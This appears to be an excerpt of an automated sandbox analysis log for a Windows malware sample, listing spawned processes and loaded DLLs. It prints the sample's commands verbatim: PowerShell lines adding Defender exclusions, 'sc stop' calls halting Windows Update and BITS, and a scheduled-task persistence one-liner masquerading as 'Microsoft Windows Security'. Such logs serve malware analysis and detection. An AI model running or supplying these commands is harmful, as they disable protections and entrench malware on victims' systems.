Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
Source: unknown	Process created: C:\Windows\sysppvrdnvs.exe "C:\Windows\sysppvrdnvs.exe"
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\158238779.exe C:\Users\user~1\AppData\Local\Temp\158238779.exe
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\281653412.exe C:\Users\user~1\AppData\Local\Temp\281653412.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\1332331323.exe C:\Users\user~1\AppData\Local\Temp\1332331323.exe
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\2311326414.exe C:\Users\user~1\AppData\Local\Temp\2311326414.exe
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\446629599.exe C:\Users\user~1\AppData\Local\Temp\446629599.exe
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Process created: C:\Users\user\AppData\Local\Temp\2448028260.exe C:\Users\user~1\AppData\Local\Temp\2448028260.exe
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Process created: C:\Users\user\sysppvrdnvs.exe C:\Users\user\sysppvrdnvs.exe
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\sysppvrdnvs.exe "C:\Users\user\sysppvrdnvs.exe"
Source: unknown	Process created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
Source: unknown	Process created: C:\Users\user\sysppvrdnvs.exe "C:\Users\user\sysppvrdnvs.exe"
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\193938922.exe C:\Users\user~1\AppData\Local\Temp\193938922.exe
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\236013504.exe C:\Users\user~1\AppData\Local\Temp\236013504.exe
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\65841553.exe C:\Users\user~1\AppData\Local\Temp\65841553.exe
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Process created: C:\Users\user\AppData\Local\Temp\70AF.exe "C:\Users\user~1\AppData\Local\Temp\70AF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Process created: C:\Users\user\AppData\Local\Temp\1706633239.exe C:\Users\user~1\AppData\Local\Temp\1706633239.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Process created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exe	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\158238779.exe C:\Users\user~1\AppData\Local\Temp\158238779.exe	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\281653412.exe C:\Users\user~1\AppData\Local\Temp\281653412.exe	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\1332331323.exe C:\Users\user~1\AppData\Local\Temp\1332331323.exe	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\2311326414.exe C:\Users\user~1\AppData\Local\Temp\2311326414.exe	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\446629599.exe C:\Users\user~1\AppData\Local\Temp\446629599.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Process created: C:\Users\user\AppData\Local\Temp\2448028260.exe C:\Users\user~1\AppData\Local\Temp\2448028260.exe
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Process created: C:\Users\user\sysppvrdnvs.exe C:\Users\user\sysppvrdnvs.exe
Source: C:\Users\user\AppData\Local\Temp\2448028260.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\AppData\Local\Temp\2448028260.exe	Process created: unknown unknown
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\193938922.exe C:\Users\user~1\AppData\Local\Temp\193938922.exe
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\236013504.exe C:\Users\user~1\AppData\Local\Temp\236013504.exe
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Users\user\AppData\Local\Temp\65841553.exe C:\Users\user~1\AppData\Local\Temp\65841553.exe
Source: C:\Users\user\sysppvrdnvs.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
